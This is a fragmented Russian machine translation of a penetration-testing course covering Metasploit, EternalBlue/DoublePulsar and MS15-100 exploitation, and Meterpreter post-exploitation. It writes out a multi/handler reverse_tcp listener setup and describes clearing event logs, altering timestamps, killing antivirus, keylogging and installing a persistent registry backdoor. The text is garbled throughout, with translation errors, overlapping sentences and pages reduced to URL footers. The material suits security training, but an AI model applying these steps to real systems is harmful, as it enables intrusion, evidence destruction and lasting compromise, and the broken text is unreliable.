папка modules /. Если мы перейдем в каталог модулей (modules /), мы
увидим, что есть разные типы модулей:
https://translate.googleusercontent.com/translate_f 155/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
1. Одиночный разряд
2. Этапы
3. Стадеры
https://translate.googleusercontent.com/translate_f 157/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Полезные данные этапов, например, Meterpreter, сначала отправляются полезные данные этапов.
Затем Metasploit координирует работу с полезной нагрузкой удаленного стейджера -
работает на машине жертвы - чтобы перенести этапы
полезная нагрузка (например, Meterpreter).
https://translate.googleusercontent.com/translate_f 158/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Каталог скриптов
Этот каталог содержит сценарии, автоматизирующие определенные функции. Эти сценарии
не являются частью основной платформы Metasploit и разработаны
участники. Некоторые из них даже устарели. Есть четыре под-
каталоги в этом каталоге:
Каталог инструментов
Чтобы расширить возможности Metasploit, его разработчиков и участников
создали определенные инструменты в виде скриптов Ruby, которые можно использовать из Metasploit.
Некоторые из этих инструментов выполняют функции, аналогичные другим внешним инструментам (для
например, psexec). Этот каталог содержит следующие подкаталоги:
https://translate.googleusercontent.com/translate_f 159/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Dev : он содержит скрипты Ruby, которые полезны для Metasploit.
разработка.
Документы : он содержит скрипты, которые находят информацию о модулях и
их документация. В настоящее время существует только один скрипт Python,
issue_finder.py.
Эксплойт : он содержит скрипты Ruby, которые полезны во время
процесс эксплуатации. Вот некоторые из полезных:
exe2vba.rb: преобразует EXE-файл в сценарий VBA, который
может использоваться как макрос в MS Word / Excel.
Каталог плагинов
Этот каталог содержит сценарии Ruby, расширяющие функциональность
Metasploit. Вот некоторые из полезных плагинов:
https://translate.googleusercontent.com/translate_f 160/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр. Решебника 213
Запуск Metasploit
Лучший способ запустить и использовать metasploit - через его интерактивную консоль:
msfconsole. Вы можете выполнить следующую команду:
#msfconsole
Когда интерактивная консоль запустится, вы увидите индикатор
msf5>
Печатать либо помогите, либо? предоставит вам список всех доступных команд. В
Ниже приведены некоторые важные команды:
использовать позволяет использовать эксплойт или аксилиарный модуль.
установленный позволяет вам устанавливать переменные (параметры) для эксплойта или
полезная нагрузка.
Setg позволяет вам установить переменную глобально.
получать позволяет читать значение переменной.
Getg позволяет читать глобальное значение переменной.
сброшен позволяет сбросить значение переменной.
unsetg позволяет сбросить глобальное значение переменной.
поиск позволяет искать определенный модуль.
сессии позволяет вам видеть и взаимодействовать с различными сеансами.
назад позволяет выйти за пределы модуля.
параметры позволяет увидеть параметры и переменные для
модуль.
передовой позволяет увидеть дополнительные параметры.
Я. Выберите эксплойт
После того, как вы выбрали эксплойт и установили полезную нагрузку, вы можете ввести
параметры команды, чтобы увидеть доступные параметры и переменные, которые
нужно настроить. Вы настраиваете параметры, набирая
команда:
установить <ПЕРЕМЕННАЯ> <ЗНАЧЕНИЕ>
Вот несколько примеров:
установить RHOST 192.168.1.200
RPCbind будет установить дополнительные инструменты , такие как RPC, rpcinfo , rpcdebug ,
rpcgen и т. д. Мы можем использовать rpcinfo для получения информации об удаленном RPC.
Сервисы:
https://translate.googleusercontent.com/translate_f 163/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Приведенный выше вывод показывает, что корневой каталог экспортирован и любой (*)
можно смонтировать. Теперь мы можем создать временный каталог ( / tmp / metasploitable ) и
затем используйте команду mount.nfs, чтобы смонтировать удаленный корневой каталог в наш
локальный временный каталог.
https://translate.googleusercontent.com/translate_f 164/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
https://translate.googleusercontent.com/translate_f 165/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Примечание : если vncviewer не существует в вашей системе, вы можете установить его как часть
пакет, xtightvncviewer:
$ sudo apt-get install xtightvncviewer
https://translate.googleusercontent.com/translate_f 166/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
https://translate.googleusercontent.com/translate_f 167/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
правильный ( / root / Eternalblue-
Даблпульсар-Метасплоит / депс / ). Иначе,
вам нужно будет отрегулировать этот параметр.
Примечание: Doublepulsar - это имплантат, используемый
Эксплойты АНБ; он вводится сначала в
уязвимая система, то она используется для ввода
другие бэкдоры.
ВЕЧНЫЙ БЛЮПАТ Это путь к Eternalblue-2.2.0.exe . Если
вы установили пакет Git в корень
домашний каталог, то значение по умолчанию -
правильный ( / root / Eternalblue-
Даблпульсар-Метасплоит / депс / ). Иначе,
вам нужно будет отрегулировать этот параметр.
ПРОЦЕССИНЖЕКТ Это процесс, в котором
Будет введен имплантат Doublepulsar . В
самый надежный системный процесс - spoolsv.exe
который мы будем использовать здесь.
РОСТЫ Это целевой системный IP-адрес Windows 7.
адрес
ЦЕЛЕВАЯ ХИТЕКТУРА Это может быть x64 или x86. В нашем случае
значение по умолчанию (x86) является правильным.
WINEPATH Это путь к папке WINE. если ты
установили WINE как root, путь
должно быть /root/.wine/drive_c/
LHOST Это машина, которая получит
Обратное TCP-соединение. Это наша Кали
IP-адрес Linux.
LPORT Это порт прослушивания на LHOST. Мы
оставит значение по умолчанию (4444)
https://translate.googleusercontent.com/translate_f 168/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
meterpreter>
Если вы видите приглашение [meterpreter>], это означает, что эксплуатация
успешный. Мы рассмотрим Meterpreter в следующей главе.
Использование Windows Media Center (WMC): MS15-100
Уязвимость
Это клиентская эксплуатация. Сгенерируем вредоносный файл, отправим по адресу
жертва, и после казни она даст нам доступ. Эта уязвимость
был обнаружен в 2015 году в Windows Media Center (WMC) на Windows 7
и 8. Медиацентру может быть передан вредоносный файл списка воспроизведения (* .mcl).
содержащий ссылку на вредоносный исполняемый файл. Затем WMC загружает и
запускает вредоносный файл.
Запустите Metasploit Console:
корень @ kali: ~ # msfconsole
Вариант Описание
ИМЯ ФАЙЛА Это имя файла MCL; выходной файл
будет отправлено жертве с помощью любого Социального
Инженерные средства.
ИМЯ ФАЙЛА Это имя файла EXE-бэкдора.
Metasploit опубликует этот файл как сетевой ресурс.
(SMB / 445). WMC у жертвы скачает
и запустите этот файл.
LHOST Это машина, которая получит обратный
Подключение TCP Meterpreter. В нашем примере это
наша машина Kali.
LPORT Это порт прослушивания на LHOST.
https://translate.googleusercontent.com/translate_f 169/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Как только жертва получит файл songs.mcl , он будет выглядеть следующим образом:
meterpreter>
https://translate.googleusercontent.com/translate_f 171/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Мы можем проверить версию ядра Linux с помощью команды uname -a:
https://translate.googleusercontent.com/translate_f 172/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Модуль 08 Постэксплуатация.
Постэксплуатация - это этап, который включает в себя все тактики и уловки хакера.
работает после успешного использования системы. Имея прочный пост-
навыки эксплуатации необходимы любому профессиональному тестеру на проникновение, чтобы
получить максимальную отдачу от жертвы. Обладая постэксплуатационными навыками, мы знаем, как
перемещаться по системе жертвы, извлекать конфиденциальную информацию, оставаться скрытым и
незамеченными, имеют постоянный доступ и проникают дальше в сеть.
Качество теста на проникновение оценивается по качеству его пост-
тактика эксплуатации, приемы и исполнение. Постэксплуатационная работа
что определяет уровень нарушения конфиденциальности, целостности и
доступность деловой информации. Таким образом, это жизненно важно для любого проникновения.
тестировщик или член красной команды, чтобы улучшить свои навыки после эксплуатации.
К сожалению, многие из этих консультантов не останавливаются на уязвимостях и
находки, обнаруженные ранее во время помолвки; немногие другие действительно
использовать некоторые из этих уязвимостей и проникнуть в несколько систем. Тем не мение,
мало тех, кто оттачивает свои знания и навыки для достижения
максимальные результаты на постэксплуатационном этапе.
Давайте быстро резюмируем, что на самом деле должен делать тестер на проникновение.
в момент, когда они получают удаленное управление, то есть оболочку, над одной системой:
перезагружать.
Доступ к файлам данных : загрузите все файлы данных, доступные на
система. Файлы данных могут быть документами, мультимедийными файлами, базами данных,
исходные коды, кешированные веб-файлы и т. д. Эти файлы данных содержат
https://translate.googleusercontent.com/translate_f 173/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
конфиденциальная деловая информация; и они являются вашим доказательством
успешное проникновение.
Поворот и ретрансляция : вот где вы используете скомпрометированный
система как точка, чтобы глубже проникнуть в целевую сеть. Через
к этой единственной системе вы можете подключиться к другим системам и ресурсам
которые иначе недоступны прямо с вашей стороны. Это это
конкретный шаг, который я собираюсь изложить ниже!
Есть много инструментов, которые хакер может использовать для постэксплуатации. Однако один из
лучшие инструменты дают нам универсальный пакет для обработки постэксплуатационных
Meterpreter - The Met asploit Int erpreter .
О Meterpreter
Meterpreter - это полезная нагрузка - набор машинных инструкций,
особенность и многоцелевой. В отличие от традиционных полезных нагрузок, порождающих оболочку,
Meterpreter был создан, чтобы дать злоумышленникам и пентестерам продвинутый пост-
эксплуатационные манипуляции. Ниже приведены его основные характеристики:
окна / meterpreter_bind_tcp
окна / meterpreter_reverse_tcp
окна / meterpreter_reverse_http
А вот список распространенных полезных нагрузок поэтапного Meterpreter:
https://translate.googleusercontent.com/translate_f 174/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
meterpreter>
Затем файл ELF (Executable and Linking Format) может быть доставлен в
машина Linux.
Обратите внимание, что лучше использовать обратный TCP или обратный HTTP, когда
https://translate.googleusercontent.com/translate_f 176/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
создание автономного исполняемого файла вместо Bind TCP или Bind HTTP. В
причина этого в том, что вы не можете быть уверены, когда жертва выполнит
файл. Лучше установить слушателя (обработчика) на своей стороне и дождаться
соединение, чем продолжать попытки соединиться с жертвой.
Однако для установления соединения с Meterpreter существует
дополнительный шаг, который нам нужно сделать перед отправкой исполняемого файла в
потерпевший; и этот шаг - настройка обработчика на нашей машине Metasploit.
Metasploit поставляется с модулем Multi Hander (эксплойт / мульти / обработчик), который
может получать соединения для разных полезных нагрузок с разных платформ. Из
в MsfConsole введите следующие команды:
msf5> используйте эксплойт / мульти / обработчик
msf5 exploit (multi / handler)> установить PAYLOAD windows / meterpreter / reverse_tcp
msf5 exploit (multi / handler)> установить LHOST [IP атакующего]
msf5 exploit (multi / handler)> установить LPORT 4444
msf5 exploit (multi / handler)> установить ExitOnSession false
эксплойт msf5 (мульти / обработчик)> эксплойт -j -z
Получение информации
Когда мы врываемся в систему и получаем сеанс Meterpreter, первый шаг
состоит в том, чтобы изучить систему и получить как можно больше информации. Meterpreter
предоставляет встроенные команды для исследования целевой системы. Кроме того,
в категории «пост» есть модули, которые также помогают в получении
Информация. Разница между командами и модулями в том, что
команды являются встроенными функциями ядра Meterpreter и являются частью
полезной нагрузки в системе жертвы. С другой стороны, модули размещаются
в системе Metasploit и взаимодействовать во время выполнения с ядром Meterpreter, чтобы
выполнять предусмотренные функции. Команды Meterpreter набираются прямо в
Приглашение Meterpreter, в то время как модули должны использоваться из Metasploit
незамедлительный.
Команды
> sysinfo
https://translate.googleusercontent.com/translate_f 177/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
> получить
> getpid
> пс
В нем перечислены все запущенные процессы вместе с их PID и PPID ( родительский
Идентификатор процесса ). Проверяя PID предыдущей команды, вы можете узнать
имя процесса. (В нашем примере Meterpreter внедряется в rundll32.exe
процесс)
https://translate.googleusercontent.com/translate_f 178/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
> ipconfig
> ifconfig
Он показывает IP-конфигурацию системы-жертвы. Инструменты Meterpreter
обе команды, ipconfig и ifconfig, идентичны. Таким образом, вы можете выбрать
в зависимости от того, с чем вы знакомы.
> маршрут
https://translate.googleusercontent.com/translate_f 179/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
> arp
Он печатает таблицу ARP в системе-жертве.
https://translate.googleusercontent.com/translate_f 180/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
> netstat
Он печатает информацию о сетевых подключениях и прослушивающих сокетах. в
пример ниже, мы видим, что процесс rundll32.exe создает сеть
подключение к нашему Kali Linux.
> enumdesktops
В нем перечислены все доступные рабочие столы на целевых жертвах.
https://translate.googleusercontent.com/translate_f 181/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
> getdesktop
Он показывает текущий рабочий стол, связанный с текущим процессом.
В следующем примере показан рабочий стол, связанный с процессом.
rundll32.exe; это рабочий стол по умолчанию (D) на Windows Station 0 (W) в
Сессия 0:
https://translate.googleusercontent.com/translate_f 182/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
> простой
Он печатает время (в часах, минутах и секундах), в течение которого жертва
система простаивала.
> скриншот
Он делает снимок экрана рабочего стола текущей жертвы и сохраняет его как
изображение в каталоге / tmp /.
Модули
Наиболее часто используемые модули - это скрипты Ruby в Metasploit.
Фреймворк. Чтобы запустить любой из них, их нужно использовать не из
Обратите внимание, что при использовании любого из модулей Post вам необходимо:
настроить определенные параметры. Самый важный из которых - СЕССИЯ.
параметр, указывающий на идентификатор сеанса Meterpreter. Узнать ID
вашего сеанса, вы всегда можете набрать команду 'sessions':
https://translate.googleusercontent.com/translate_f 183/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
https://translate.googleusercontent.com/translate_f 185/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр. Решебника 249
Повышение привилегий
После сбора информации о нашей системе-жертве пришло время попытаться
повысить наши привилегии. Meterpreter предоставляет одну встроенную команду -
getystem - и несколько модулей, которые пытаются получить такие же высокие привилегии, как
возможный. Мы обсудим команду и модули в следующих
подразделы:
Команда: getsystem
Команда getsystem Meterpreter пытается получить привилегию SYSTEM.
(что выше, чем у администратора в Windows) через одну из
следующие три техники:
https://translate.googleusercontent.com/translate_f 186/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
1. Именованный канал выдачи себя за другое лицо (в памяти / у администратора)
Канал - это функция ОС, которая действует как канал между двумя процессами.
чтобы они общались (ввод / вывод). Одна из характеристик
каналов в Windows заключается в том, что один процесс на одном конце канала может
олицетворять другой процесс, подключенный к другому концу. Измеритель -
процесс с низким уровнем привилегий - создает канал, а затем запрашивает
определенный процесс с привилегией SYSTEM для подключения к другому концу
труба. После подключения этого системного процесса Meterpreter может использовать
контекст безопасности этого процесса, чтобы имитировать его.
Затем вы можете использовать постэксплуатационные модули, чтобы повысить свои привилегии как
описано в следующем разделе.
модули
Metasploit содержит множество модулей для локального повышения привилегий. Чтобы
знать, какие из них применимы к вашей системе-жертве, Metasploit предоставляет
https://translate.googleusercontent.com/translate_f 187/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Почтовый модуль только для такой разведки. Этот модуль
сообщение / multi / recon / local_exploit_suggester.
https://translate.googleusercontent.com/translate_f 188/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
https://translate.googleusercontent.com/translate_f 189/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
https://translate.googleusercontent.com/translate_f 190/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Главный шаг - вызвать
злоумышленник может функцию
заменить копирования
эту функциюизображения в пользовательском
другой, которая в конечном итогережиме. Однако
выполняется на
режим ядра. Успешная эксплуатация приводит к повышению привилегий.
Покрытие следов
Важным шагом в постэксплуатации является сокрытие ваших следов и прикрытия.
следы вашей деятельности. Это можно сделать, удалив журналы, в которых отображаются ваши
действия и изменить временные метки ваших созданных файлов. Кроме того, этот шаг
также включает в себя убийство или отключение антивирусных программ. Есть три
команды и модули, которые нам здесь помогают. А это:
Команда clearev
Команда timestomp
Модуль / post / windows / manage / killav
Команда clearev
Базовая служба Meterpreter включает команду, которая очищает все журналы в системе.
Средство просмотра событий Windows. Windows классифицирует журналы событий на три
категории: журналы приложений, журналы безопасности и системные журналы.
https://translate.googleusercontent.com/translate_f 191/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Вы можете запустить команду clearev в любое время во время сеанса, и она очистит
из всех журналов событий.
После того, как вы запустите команду, в средстве просмотра событий будет 0 журналов:
Команда timestomp
Эта команда позволяет вам изменять временные метки, связанные с любым файлом.
Файловые системы Windows, такие как FAT и NTFS, поддерживают три основных метки времени.
для каждого файла:
https://translate.googleusercontent.com/translate_f 192/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Команда timestamp может изменять и изменять каждый из четырех
отметки времени, описанные выше. Ниже приводится справочное меню этого
команда:
Чтобы установить все временные метки на определенное время, вы можете использовать параметр (-z) и
укажите новую метку времени в формате «ММ / ДД / ГГГГ.
ЧЧ24: ММ: СС »следующим образом:
В следующей таблице показаны некоторые антивирусные продукты, которые могут быть уничтожены
Измеритель:
https://translate.googleusercontent.com/translate_f 194/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Ключевой журнал
Ведение журнала ключей - это процесс записи того, что пользователь вводит на своей
клавиатура. Meterpreter предлагает три команды для такой функции:
https://translate.googleusercontent.com/translate_f 195/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
pwd
lpwd
cd (например, cd c: \\ )
cat <имя_файла>
https://translate.googleusercontent.com/translate_f 197/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Эта команда
Система загружает
Metasploit . определенный файл из целевой системы в
загрузить <имя_файла>
Show_mount
https://translate.googleusercontent.com/translate_f 198/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Постоянный бэкдор
Тип доступа, которого мы достигли до сих пор, является временным; мы теряем это однажды
система выключается или перезагружается. Таким образом, если мы хотим иметь постоянный или
постоянное соединение, нам нужно установить бэкдор, который восстанавливает
сеанс после перезагрузки. Meterpreter предлагает различные модули для достижения
желаемая настойчивость. Мы сосредоточимся здесь на двух таких модулях:
эксплойт / окна / локальный / постоянство
Этот модуль выполняет следующие шаги:
https://translate.googleusercontent.com/translate_f 199/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Система Metasploit и устанавливает сеанс.
Здесь важно отметить, что вам нужно будет настроить Multi Handler на
Metasploit. Задача обработчика - получить соединение от постоянного
черный ход. Рекомендуется настроить обработчик перед запуском
модуль сохранения.
https://translate.googleusercontent.com/translate_f 200/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
https://translate.googleusercontent.com/translate_f 202/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
https://translate.googleusercontent.com/translate_f 203/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
https://translate.googleusercontent.com/translate_f 204/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Были выполнены следующие действия:
Новый раздел реестра HKLM \ Software \ o2cnhF2U был
созданный.
Внутри этого ключа было создано новое значение Jy93Fh7X . Значение
содержит полезную нагрузку как длинный двоичный объект (BLOB).
https://translate.googleusercontent.com/translate_f 205/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение